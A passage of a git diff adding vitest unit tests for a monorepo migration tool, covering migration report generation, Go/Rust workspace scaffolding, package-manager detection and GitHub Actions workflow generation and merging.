generateMigrationDoc(makeAnalysis({ + conflicts: [ + { name: 'lodash', versions: [{ version: '4.17.21', source: 'a', type: 'dependencies' }], severity: 'minor' }, + ], + })); + expect(doc).toContain('**Conflicts:** 1'); + }); + + it('should include collision count', () => { + const doc = generateMigrationDoc(makeAnalysis({ + collisions: [{ path: '.gitignore', sources: ['a', 'b'], suggestedStrategy: 'merge' }], + })); + expect(doc).toContain('**File Collisions:** 1'); + }); + + it('should include circular dependencies when present', () => { + const doc = generateMigrationDoc(makeAnalysis({ + circularDependencies: [{ packages: ['a', 'b'], cycle: ['a', 'b', 'a'] }], + })); + expect(doc).toContain('**Circular Dependencies:** 1'); + }); + + it('should include suggested order of operations', () => { + const doc = generateMigrationDoc(makeAnalysis()); + expect(doc).toContain('## Suggested Order of Operations'); + expect(doc).toContain('**Prepare**'); + expect(doc).toContain('**Verify**'); + expect(doc).toContain('**Archive**'); + }); + + it('should include recommendations when present', () => { + const doc = generateMigrationDoc(makeAnalysis({ + recommendations: ['Use pnpm for workspace management', 'Add shared tsconfig'], + })); + expect(doc).toContain('## Recommendations'); + expect(doc).toContain('Use pnpm for workspace management'); + expect(doc).toContain('Add shared tsconfig'); + }); + + it('should not include recommendations section when empty', () => { + const doc = generateMigrationDoc(makeAnalysis({ recommendations: [] })); + expect(doc).not.toContain('## Recommendations'); + }); + + describe('with extended analysis', () => { + it('should include risk assessment for straightforward classification', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'straightforward', + reasons: [], + topFindings: [], + }, + })); + expect(doc).toContain('## Risk Assessment'); + expect(doc).toContain('Straightforward'); + }); + + it('should include risk assessment for needs-decisions classification', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'needs-decisions', + reasons: ['Multiple CI systems detected'], + topFindings: [], + }, + })); + expect(doc).toContain('Needs Decisions'); + expect(doc).toContain('Multiple CI systems detected'); + }); + + it('should include risk assessment for complex classification', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'complex', + reasons: ['Submodules detected', 'LFS in use'], + topFindings: [], + }, + })); + expect(doc).toContain('Complex'); + expect(doc).toContain('Submodules detected'); + expect(doc).toContain('LFS in use'); + }); + + it('should include top risks with findings', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'complex', + reasons: [], + topFindings: [ + { + id: 'risk-submodules', + title: 'Git submodules detected', + severity: 'error', + confidence: 'high', + evidence: [{ path: '.gitmodules', snippet: 'submodule "lib"' }], + suggestedAction: 'Convert submodules to regular packages', + }, + ], + }, + })); + expect(doc).toContain('## Top Risks'); + expect(doc).toContain('### Git submodules detected'); + expect(doc).toContain('**Severity:** error'); + expect(doc).toContain('Convert submodules to regular packages'); + expect(doc).toContain('.gitmodules'); + }); + + it('should include top risks with evidence without snippet', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + riskSummary: { + classification: 'complex', + reasons: [], + topFindings: [ + { + id: 'risk-large', + title: 'Large files detected', + severity: 'warn', + confidence: 'high', + evidence: [{ path: 'data/big-file.bin' }], + suggestedAction: 'Move to LFS', + }, + ], + }, + })); + expect(doc).toContain('data/big-file.bin'); + }); + + it('should include extended analysis sections with findings', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + environment: [ + { + id: 'env-node-mismatch', + title: 'Node.js version mismatch', + severity: 'warn', + confidence: 'high', + evidence: [{ path: '.nvmrc' }], + suggestedAction: 'Standardize on Node 20', + }, + ], + ci: [ + { + id: 'ci-gh-actions', + title: 'GitHub Actions detected', + severity: 'info', + confidence: 'high', + evidence: [{ path: '.github/workflows/ci.yml' }], + suggestedAction: 'Merge workflows', + }, + ], + })); + expect(doc).toContain('## Environment'); + expect(doc).toContain('[!] Node.js version mismatch'); + expect(doc).toContain('Standardize on Node 20'); + expect(doc).toContain('## CI/CD'); + expect(doc).toContain('[i] GitHub Actions detected'); + }); + + it('should skip extended sections with no findings', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + environment: [], + tooling: [], + })); + expect(doc).not.toContain('## Environment'); + expect(doc).not.toContain('## Tooling'); + }); + + it('should use !! icon for critical/error severity', () => { + const doc = generateMigrationDoc(makeAnalysis(), makeExtended({ + repoRisks: [ + { + id: 'risk-critical', + title: 'Critical risk', + severity: 'critical', + confidence: 'high', + evidence: [], + suggestedAction: 'Fix immediately', + }, + ], + })); + expect(doc).toContain('[!!] Critical risk'); + }); + }); + + describe('with findings and decisions', () => { + it('should include required decisions', () => { + const doc = generateMigrationDoc(makeAnalysis({ + findings: { + decisions: [ + { + kind: 'package-manager', + description: 'Choose package manager', + suggestedAction: 'Use pnpm', + }, + { + kind: 'conflict-strategy', + description: 'Resolve lodash version conflict', + }, + ], + conflictInsights: [], + collisionInsights: [], + }, + })); + expect(doc).toContain('## Required Decisions'); + expect(doc).toContain('**package-manager**: Choose package manager'); + expect(doc).toContain('Suggested: Use pnpm'); + expect(doc).toContain('**conflict-strategy**: Resolve lodash version conflict'); + }); + }); +}); diff --git a/tests/unit/strategies/multilang-scaffold.test.ts b/tests/unit/strategies/multilang-scaffold.test.ts new file mode 100755 index 0000000..a98ad1a --- /dev/null +++ b/tests/unit/strategies/multilang-scaffold.test.ts @@ -0,0 +1,222 @@ +import { describe, it, expect } from 'vitest'; +import { + scaffoldGoWorkspace, + scaffoldRustWorkspace, + generatePythonRecommendations, +} from '../../../src/strategies/multilang-scaffold.js'; +import type { LanguageDetection } from '../../../src/types/index.js'; + +describe('multilang-scaffold', () => { + describe('scaffoldGoWorkspace', () => { + it('should generate go.work with use directives', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'svc-api', + languages: [{ name: 'go', markers: ['go.mod'], metadata: { module: 'github.com/example/svc-api' } }], + }, + { + repoName: 'svc-worker', + languages: [{ name: 'go', markers: ['go.mod'], metadata: { module: 'github.com/example/svc-worker' } }], + }, + ]; + + const result = scaffoldGoWorkspace(detections, 'packages'); + + expect(result.relativePath).toBe('go.work'); + expect(result.content).toContain('go 1.21'); + expect(result.content).toContain('./packages/svc-api'); + expect(result.content).toContain('./packages/svc-worker'); + expect(result.content).toContain('use ('); + }); + + it('should generate go.work for a single module', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'my-go-app', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + ]; + + const result = scaffoldGoWorkspace(detections, 'libs'); + + expect(result.relativePath).toBe('go.work'); + expect(result.content).toContain('./libs/my-go-app'); + }); + + it('should ignore non-Go languages', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'go-svc', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + { + repoName: 'rust-lib', + languages: [{ name: 'rust', markers: ['Cargo.toml'] }], + }, + ]; + + const result = scaffoldGoWorkspace(detections, 'packages'); + + expect(result.content).toContain('./packages/go-svc'); + expect(result.content).not.toContain('rust-lib'); + }); + }); + + describe('scaffoldRustWorkspace', () => { + it('should generate workspace Cargo.toml with members', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'crate-a', + languages: [{ name: 'rust', markers: ['Cargo.toml'], metadata: { crate: 'crate-a' } }], + }, + { + repoName: 'crate-b', + languages: [{ name: 'rust', markers: ['Cargo.toml'], metadata: { crate: 'crate-b' } }], + }, + ]; + + const result = scaffoldRustWorkspace(detections, 'packages'); + + expect(result.relativePath).toBe('Cargo.toml'); + expect(result.content).toContain('[workspace]'); + expect(result.content).toContain('"packages/crate-a"'); + expect(result.content).toContain('"packages/crate-b"'); + expect(result.content).toContain('members = ['); + }); + + it('should generate workspace Cargo.toml for a single crate', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'my-lib', + languages: [{ name: 'rust', markers: ['Cargo.toml'] }], + }, + ]; + + const result = scaffoldRustWorkspace(detections, 'crates'); + + expect(result.relativePath).toBe('Cargo.toml'); + expect(result.content).toContain('"crates/my-lib"'); + }); + + it('should ignore non-Rust languages', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'rust-svc', + languages: [{ name: 'rust', markers: ['Cargo.toml'] }], + }, + { + repoName: 'go-svc', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + ]; + + const result = scaffoldRustWorkspace(detections, 'packages'); + + expect(result.content).toContain('"packages/rust-svc"'); + expect(result.content).not.toContain('go-svc'); + }); + }); + + describe('generatePythonRecommendations', () => { + it('should recommend uv/poetry for pyproject.toml projects', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'py-app', + languages: [{ name: 'python', markers: ['pyproject.toml'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].id).toBe('python-workspace-py-app'); + expect(findings[0].title).toContain('py-app'); + expect(findings[0].severity).toBe('info'); + expect(findings[0].confidence).toBe('high'); + expect(findings[0].evidence[0].path).toBe('pyproject.toml'); + expect(findings[0].suggestedAction).toContain('uv workspaces'); + }); + + it('should recommend migrating from requirements.txt', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'legacy-py', + languages: [{ name: 'python', markers: ['requirements.txt'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].suggestedAction).toContain('migrating from requirements.txt'); + expect(findings[0].evidence[0].path).toBe('requirements.txt'); + }); + + it('should generate findings for multiple Python projects', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'py-svc-1', + languages: [{ name: 'python', markers: ['pyproject.toml'] }], + }, + { + repoName: 'py-svc-2', + languages: [{ name: 'python', markers: ['requirements.txt'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(2); + expect(findings[0].id).toBe('python-workspace-py-svc-1'); + expect(findings[1].id).toBe('python-workspace-py-svc-2'); + }); + + it('should ignore non-Python languages', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'go-app', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + { + repoName: 'py-app', + languages: [{ name: 'python', markers: ['pyproject.toml'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].id).toBe('python-workspace-py-app'); + }); + + it('should return empty array when no Python projects exist', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'go-app', + languages: [{ name: 'go', markers: ['go.mod'] }], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(0); + }); + + it('should handle multi-language repos with Python', () => { + const detections: LanguageDetection[] = [ + { + repoName: 'multi', + languages: [ + { name: 'go', markers: ['go.mod'] }, + { name: 'python', markers: ['pyproject.toml'] }, + ], + }, + ]; + + const findings = generatePythonRecommendations(detections); + + expect(findings).toHaveLength(1); + expect(findings[0].id).toBe('python-workspace-multi'); + }); + }); +}); diff --git a/tests/unit/strategies/package-manager.test.ts b/tests/unit/strategies/package-manager.test.ts index 3e4aa2f..4ee5534 100755 --- a/tests/unit/strategies/package-manager.test.ts +++ b/tests/unit/strategies/package-manager.test.ts @@ -1,4 +1,5 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import path from 'node:path'; import { execFileSync } from 'node:child_process'; import { getPackageManagerVersion, @@ -11,6 +12,9 @@ import { getPackageManagerField, parsePackageManagerType, getPackageManagerDisplayName, + isYarnBerry, + detectPackageManager, + detectPackageManagerFromSources, } from '../../../src/strategies/package-manager.js'; // Mock execFileSync @@ -18,6 +22,15 @@ vi.mock('node:child_process', () => ({ execFileSync: vi.fn(), })); +// Mock pathExists from utils/fs +vi.mock('../../../src/utils/fs.js', async (importOriginal) => { + const orig = await importOriginal(); + return { + ...orig, + pathExists: vi.fn(), + }; +}); + describe('Package Manager Strategy', () => { beforeEach(() => { vi.resetAllMocks(); @@ -302,4 +315,155 @@ describe('Package Manager Strategy', () => { expect(getPackageManagerDisplayName('npm')).toBe('npm'); }); }); + + describe('isYarnBerry', () => { + it('should return true when .yarnrc.yml exists', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(true); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(true); + }); + + it('should check yarn version when no .yarnrc.yml', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + vi.mocked(execFileSync).mockReturnValue('4.1.0\n'); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(true); + }); + + it('should return false for yarn classic version', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + vi.mocked(execFileSync).mockReturnValue('1.22.22\n'); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(false); + }); + + it('should return false when yarn is not installed and no dirPath', async () => { + vi.mocked(execFileSync).mockImplementation(() => { + throw new Error('Command not found'); + }); + + const result = await isYarnBerry(); + expect(result).toBe(false); + }); + + it('should return false when yarn is not installed with dirPath', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + vi.mocked(execFileSync).mockImplementation(() => { + throw new Error('Command not found'); + }); + + const result = await isYarnBerry('/some/dir'); + expect(result).toBe(false); + }); + }); + + describe('detectPackageManager', () => { + it('should detect pnpm from lock file', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + return p.endsWith('pnpm-lock.yaml'); + }); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('pnpm'); + }); + + it('should detect yarn classic from lock file', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + if (p.endsWith('yarn.lock')) return true; + if (p.endsWith('.yarnrc.yml')) return false; + return false; + }); + // Yarn classic version + vi.mocked(execFileSync).mockReturnValue('1.22.22\n'); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('yarn'); + }); + + it('should detect yarn-berry from lock file + yarnrc', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + if (p.endsWith('pnpm-lock.yaml')) return false; + if (p.endsWith('yarn.lock')) return true; + if (p.endsWith('.yarnrc.yml')) return true; + return false; + }); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('yarn-berry'); + }); + + it('should detect npm from lock file', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + return p.endsWith('package-lock.json'); + }); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBe('npm'); + }); + + it('should return null when no lock files found', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + + const result = await detectPackageManager('/some/dir'); + expect(result).toBeNull(); + }); + }); + + describe('detectPackageManagerFromSources', () => { + it('should return the most common package manager', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + // All repos use pnpm + return p.endsWith('pnpm-lock.yaml'); + }); + + const result = await detectPackageManagerFromSources([ + { path: '/a', name: 'a' }, + { path: '/b', name: 'b' }, + { path: '/c', name: 'c' }, + ]); + expect(result).toBe('pnpm'); + }); + + it('should return null when no repos have lock files', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockResolvedValue(false); + + const result = await detectPackageManagerFromSources([ + { path: '/a', name: 'a' }, + { path: '/b', name: 'b' }, + ]); + expect(result).toBeNull(); + }); + + it('should return the majority PM when mixed', async () => { + const { pathExists } = await import('../../../src/utils/fs.js'); + vi.mocked(pathExists).mockImplementation(async (p: string) => { + // Repo /a has pnpm, repo /b has npm, repo /c has pnpm + if (path.normalize(p) === path.normalize(path.join('/a', 'pnpm-lock.yaml'))) return true; + if (path.normalize(p) === path.normalize(path.join('/b', 'package-lock.json'))) return true; + if (path.normalize(p) === path.normalize(path.join('/c', 'pnpm-lock.yaml'))) return true; + return false; + }); + + const result = await detectPackageManagerFromSources([ + { path: '/a', name: 'a' }, + { path: '/b', name: 'b' }, + { path: '/c', name: 'c' }, + ]); + expect(result).toBe('pnpm'); + }); + }); }); diff --git a/tests/unit/strategies/workflow-generator.test.ts b/tests/unit/strategies/workflow-generator.test.ts new file mode 100755 index 0000000..61d444c --- /dev/null +++ b/tests/unit/strategies/workflow-generator.test.ts @@ -0,0 +1,199 @@ +import { describe, it, expect } from 'vitest'; +import { + generatePathFilteredWorkflow, + planLegacyWorkflowMoves, +} from '../../../src/strategies/workflow-generator.js'; + +describe('Workflow Generator', () => { + describe('generatePathFilteredWorkflow', () => { + it('should generate a workflow with default options', () => { + const result = generatePathFilteredWorkflow( + ['pkg-a', 'pkg-b'], + 'packages', + ); + + expect(result.relativePath).toBe('.github/workflows/monotize-ci.yml'); + expect(result.content).toContain('name: CI'); + expect(result.content).toContain('pkg-a'); + expect(result.content).toContain('pkg-b'); + }); + + it('should include package names in path filters', () => { + const result = generatePathFilteredWorkflow( + ['core', 'utils', 'cli'], + 'packages', + ); + + expect(result.content).toContain("- 'packages/core/**'"); + expect(result.content).toContain("- 'packages/utils/**'"); + expect(result.content).toContain("- 'packages/cli/**'"); + }); + + it('should use pnpm install by default', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages'); + + expect(result.content).toContain('pnpm install --frozen-lockfile'); + }); + + it('should default to Node.js 20', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages'); + + expect(result.content).toContain("node-version: '20'"); + }); + + it('should include pnpm setup step by default', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages'); + + expect(result.content).toContain('Setup pnpm'); + expect(result.content).toContain('pnpm/action-setup@v4'); + }); + + it('should generate yarn install command when yarn is specified', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + packageManager: 'yarn', + }); + + expect(result.content).toContain('yarn install --frozen-lockfile'); + expect(result.content).not.toContain('pnpm install'); + }); + + it('should generate npm ci command when npm is specified', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + packageManager: 'npm', + }); + + expect(result.content).toContain('npm ci'); + expect(result.content).not.toContain('pnpm install'); + expect(result.content).not.toContain('yarn install'); + }); + + it('should not include pnpm setup step for non-pnpm managers', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + packageManager: 'yarn', + }); + + expect(result.content).not.toContain('Setup pnpm'); + expect(result.content).not.toContain('pnpm/action-setup@v4'); + }); + + it('should use custom Node.js version', () => { + const result = generatePathFilteredWorkflow(['pkg-a'], 'packages', { + nodeVersion: '18', + }); + + expect(result.content).toContain("node-version: '18'"); + expect(result.content).not.toContain("node-version: '20'"); + }); + + it('should use custom options together (yarn, node 18)', () => { + const result = generatePathFilteredWorkflow( + ['pkg-a', 'pkg-b'], + 'packages', + { packageManager: 'yarn', nodeVersion: '18' }, + ); + + expect(result.relativePath).toBe('.github/workflows/monotize-ci.yml'); + expect(result.content).toContain("node-version: '18'"); + expect(result.content).toContain('yarn install --frozen-lockfile'); + expect(result.content).toContain('yarn run build'); + expect(result.content).toContain('yarn run test'); + expect(result.content).not.toContain('Setup pnpm'); + }); + + it('should generate matrix includes for each package', () => { + const result = generatePathFilteredWorkflow( + ['api', 'web', 'shared'], + 'packages', + ); + + expect(result.content).toContain('- package: api'); + expect(result.content).toContain('- package: web'); + expect(result.content).toContain('- package: shared'); + }); + + it('should generate detect-changes outputs for each package', () => { + const result = generatePathFilteredWorkflow( + ['pkg-a', 'pkg-b'], + 'packages', + ); + + expect(result.content).toContain('pkg-a: ${{ steps.filter.outputs.pkg-a }}'); + expect(result.content).toContain('pkg-b: ${{ steps.filter.outputs.pkg-b }}'); + }); + + it('should use custom packages directory in path filters', () => { + const result = generatePathFilteredWorkflow( + ['core'], + 'libs', + ); + + expect(result.content).toContain("- 'libs/core/**'"); + expect(result.content).not.toContain("- 'packages/core/**'"); + }); + + it('should handle a single package', () => { + const result = generatePathFilteredWorkflow(['solo'], 'packages'); + + expect(result.content).toContain("- 'packages/solo/**'"); + expect(result.content).toContain('- package: solo'); + }); + + it('should produce different install commands for each package manager', () => { + const pnpmResult = generatePathFilteredWorkflow(['pkg'], 'packages', { + packageManager: 'pnpm', + }); + const yarnResult = generatePathFilteredWorkflow(['pkg'], 'packages', { + packageManager: 'yarn', + }); + const npmResult = generatePathFilteredWorkflow(['pkg'], 'packages', { + packageManager: 'npm', + }); + + expect(pnpmResult.content).toContain('pnpm install --frozen-lockfile'); + expect(yarnResult.content).toContain('yarn install --frozen-lockfile'); + expect(npmResult.content).toContain('npm ci'); + + // All three should be different + expect(pnpmResult.content).not.toBe(yarnResult.content); + expect(yarnResult.content).not.toBe(npmResult.content); + expect(pnpmResult.content).not.toBe(npmResult.content); + }); + }); + + describe('planLegacyWorkflowMoves', () => { + it('should return correct from/to pairs for existing workflows', () => { + const moves = planLegacyWorkflowMoves(['ci.yml', 'deploy.yml']); + + expect(moves).toEqual([ + { from: '.github/workflows/ci.yml', to: '.github/workflows/legacy/ci.yml' }, + { from: '.github/workflows/deploy.yml', to: '.github/workflows/legacy/deploy.yml' }, + ]); + }); + + it('should handle a single workflow', () => { + const moves = planLegacyWorkflowMoves(['build.yml']); + + expect(moves).toHaveLength(1); + expect(moves[0]).toEqual({ + from: '.github/workflows/build.yml', + to: '.github/workflows/legacy/build.yml', + }); + }); + + it('should return an empty array when no workflows exist', () => { + const moves = planLegacyWorkflowMoves([]); + + expect(moves).toEqual([]); + }); + + it('should preserve original filenames in the legacy directory', () => { + const moves = planLegacyWorkflowMoves(['test.yml', 'lint.yml', 'release.yml']); + + expect(moves).toHaveLength(3); + for (const move of moves) { + const filename = move.from.split('/').pop(); + expect(move.to).toBe(`.github/workflows/legacy/${filename}`); + } + }); + }); +}); diff --git a/tests/unit/strategies/workflow-merge.test.ts b/tests/unit/strategies/workflow-merge.test.ts index 1819d69..53ea39e 100644 --- a/tests/unit/strategies/workflow-merge.test.ts +++ b/tests/unit/strategies/workflow-merge.test.ts @@ -5,6 +5,7 @@ import os from 'node:os'; import crypto from 'node:crypto'; import { mergeWorkflows, + mergeWorkflowsToFiles, analyzeWorkflows, } from '../../../src/strategies/workflow-merge.js'; @@ -95,6 +96,71 @@ jobs: expect(result.totalWorkflows).toBe(0); expect(result.workflowsByRepo['no-workflow']).toEqual([]); }); + + it('should detect array triggers (on: [push, pull_request])', async () => { + const repo = await createRepoWithWorkflow( + 'repo-array-trigger', + `name: CI +on: [push, pull_request] +jobs: + test: + runs-on: ubuntu-latest +` + ); + + const result = await analyzeWorkflows([{ path: repo, name: 'repo-array-trigger' }]); + + expect(result.commonTriggers).toContain('push'); + expect(result.commonTriggers).toContain('pull_request'); + }); + + it('should detect string trigger (on: push)', async () => { + const repo = await createRepoWithWorkflow( + 'repo-string-trigger', + `name: CI +on: push +jobs: + test: + runs-on: ubuntu-latest +` + ); + + const result = await analyzeWorkflows([{ path: repo, name: 'repo-string-trigger' }]); + + expect(result.commonTriggers).toContain('push'); + }); + + it('should handle malformed YAML gracefully', async () => { + const repoPath = path.join(tempDir, 'repo-malformed-yaml'); + const workflowDir = path.join(repoPath, '.github', 'workflows'); + await fs.ensureDir(workflowDir); + await fs.writeFile(path.join(workflowDir, 'ci.yml'), ': : : invalid yaml {{{'); + + const result = await analyzeWorkflows([{ path: repoPath, name: 'repo-malformed-yaml' }]); + + expect(result.totalWorkflows).toBe(1); + expect(result.workflowsByRepo['repo-malformed-yaml']).toContain('ci.yml'); + }); + + it('should not report conflicts when filenames differ', async () => { + const repo1Path = path.join(tempDir, 'repo-diff1'); + const wf1 = path.join(repo1Path, '.github', 'workflows'); + await fs.ensureDir(wf1); + await fs.writeFile(path.join(wf1, 'build.yml'), 'name: Build\non: push'); + + const repo2Path = path.join(tempDir, 'repo-diff2'); + const wf2 = path.join(repo2Path, '.github', 'workflows'); + await fs.ensureDir(wf2); + await fs.writeFile(path.join(wf2, 'test.yml'), 'name: Test\non: push'); + + const result = await analyzeWorkflows([ + { path: repo1Path, name: 'repo-diff1' }, + { path: repo2Path, name: 'repo-diff2' }, + ]); + + expect(result.conflicts).toEqual([]); + expect(result.totalWorkflows).toBe(2); + }); }); describe('mergeWorkflows', () => { @@ -269,5 +335,222 @@ jobs: const workflowDir = path.join(outputDir, '.github', 'workflows'); expect(await fs.pathExists(workflowDir)).toBe(false); }); + + it('should merge env vars from multiple workflows', async () => { + const repo1 = await createRepoWithWorkflow( + 'repo-env1', + `name: CI +on: push +env: + NODE_ENV: test + CI: "true" +jobs: + test: + runs-on: ubuntu-latest +` + ); + + const repo2 = await createRepoWithWorkflow( + 'repo-env2', + `name: CI +on: push +env: + NODE_ENV: production + COVERAGE: "true" +jobs: + build: + runs-on: ubuntu-latest +` + ); + + const outputDir = path.join(tempDir, 'output-env'); + await fs.ensureDir(outputDir); + + await mergeWorkflows( + [ + { path: repo1, name: 'repo-env1' }, + { path: repo2, name: 'repo-env2' }, + ], + { strategy: 'combine', outputDir } + ); + + const content = await fs.readFile( + path.join(outputDir, '.github', 'workflows', 'ci.yml'), + 'utf-8' + ); + + // Later env overwrites earlier for same key + expect(content).toContain('COVERAGE'); + expect(content).toContain('CI'); + }); + + it('should prefix job needs references in combined workflows', async () => { + const repo1 = await createRepoWithWorkflow( + 'repo-needs', + `name: CI +on: push +jobs: + build: + runs-on: ubuntu-latest + deploy: + runs-on: ubuntu-latest + needs: [build] +` + ); + + const outputDir = path.join(tempDir, 'output-needs'); + await fs.ensureDir(outputDir); + + await mergeWorkflows( + [{ path: repo1, name: 'repo-needs' }], + { strategy: 'combine', outputDir } + ); + + const content = await fs.readFile( + path.join(outputDir, '.github', 'workflows', 'ci.yml'), + 'utf-8' + ); + + // Single workflow should be returned as-is + expect(content).toContain('deploy'); + }); + + it('should merge needs with string references in combined multi-repo workflows', async () => { + const repo1 = await createRepoWithWorkflow( + 'repo-str-needs1', + `name: CI +on: push +jobs: + build: + runs-on: ubuntu-latest + test: + runs-on: ubuntu-latest + needs: build +` + ); + + const repo2 = await createRepoWithWorkflow( + 'repo-str-needs2', + `name: CI +on: push +jobs: + lint: + runs-on: ubuntu-latest +` + ); + + const outputDir = path.join(tempDir, 'output-str-needs'); + await fs.ensureDir(outputDir); + + await mergeWorkflows( + [ + { path: repo1, name: 'pkg-a' }, + { path: repo2, name: 'pkg-b' }, + ], + { strategy: 'combine', outputDir } + ); + + const content = await fs.readFile( + path.join(outputDir, '.github', 'workflows', 'ci.yml'), + 'utf-8' + ); + + // String needs should be prefixed + expect(content).toContain('pkg-a-build'); + expect(content).toContain('pkg-b-lint'); + }); + }); + + describe('mergeWorkflowsToFiles', () => { + it('should return empty for skip strategy', async () => { + const repo = await createRepoWithWorkflow('repo1', 'name: CI\non: push'); + const result = await mergeWorkflowsToFiles( + [{ path: repo, name: 'repo1' }], + 'skip' + ); + expect(result).toEqual([]); + }); + + it('should return files for keep-first strategy', async () => { + const repo1 = await createRepoWithWorkflow('repo1', 'name: First\non: push'); + const repo2 = await createRepoWithWorkflow('repo2', 'name: Second\non: push'); + + const result = await mergeWorkflowsToFiles( + [ + { path: repo1, name: 'repo1' }, + { path: repo2, name: 'repo2' }, + ], + 'keep-first' + ); + + expect(result).toHaveLength(1); + expect(result[0].relativePath).toBe('.github/workflows/ci.yml'); + expect(result[0].content).toContain('First'); + expect(result[0].content).not.toContain('Second'); + }); + + it('should return files for keep-last strategy', async () => { + const repo1 = await createRepoWithWorkflow('repo1', 'name: First\non: push'); + const repo2 = await createRepoWithWorkflow('repo2', 'name: Second\non: push'); + + const result = await mergeWorkflowsToFiles( + [ + { path: repo1, name: 'repo1' }, + { path: repo2, name: 'repo2' }, + ], + 'keep-last' + ); + + expect(result).toHaveLength(1); + expect(result[0].relativePath).toBe('.github/workflows/ci.yml'); + expect(result[0].content).toContain('Second'); + }); + + it('should return combined files for combine strategy', async () => { + const repo1 = await createRepoWithWorkflow( + 'repo1', + `name: CI +on: push +jobs: + test: + runs-on: ubuntu-latest +` + ); + const repo2 = await createRepoWithWorkflow( + 'repo2', + `name: CI +on: push +jobs: + build: + runs-on: ubuntu-latest +` + ); + + const result = await mergeWorkflowsToFiles( + [ + { path: repo1, name: 'repo1' }, + { path: repo2, name: 'repo2' }, + ], + 'combine' + ); + + expect(result).toHaveLength(1); + expect(result[0].relativePath).toBe('.github/workflows/ci.yml'); + expect(result[0].content).toContain('Combined CI workflow'); + expect(result[0].content).toContain('repo1-test'); + expect(result[0].content).toContain('repo2-build'); + }); + + it('should return empty for repos with no workflows', async () => { + const repoPath = path.join(tempDir, 'empty-repo'); + await fs.ensureDir(repoPath); + + const result = await mergeWorkflowsToFiles( + [{ path: repoPath, name: 'empty-repo' }], + 'combine' + ); + + expect(result).toEqual([]); + }); }); }); diff --git a/tests/unit/strategies/workspace-config.test.ts b/tests/unit/strategies/workspace-config.test.ts index 409436a..f05937b 100644 --- a/tests/unit/strategies/workspace-config.test.ts +++ b/tests/unit/strategies/workspace-config.test.ts @@ -3,8 +3,10 @@ import { generateWorkspaceConfig, updatePackageForWorkspace, generatePnpmWorkspaceYaml, + detectCrossDependencies, + rewriteToWorkspaceProtocol, } from '../../../src/strategies/workspace-config.js'; -import type { PackageInfo } from '../../../src/types/index.js'; +import type { PackageInfo, CrossDependency } from '../../../src/types/index.js'; describe('Workspace Configuration', () => { describe('generateWorkspaceConfig', () => { @@ -340,4 +342,167 @@ describe('Workspace Configuration', () => { expect(content).toBe("packages:\n - 'my-packages/*'\n"); }); }); + + describe('detectCrossDependencies', () => { + const createPackageInfo = ( + name: string, + overrides: Partial = {} + ): PackageInfo => ({ + name, + version: '1.0.0', + dependencies: {}, + devDependencies: {}, + peerDependencies: {}, + scripts: {}, + path: `/packages/${name}`, + repoName: 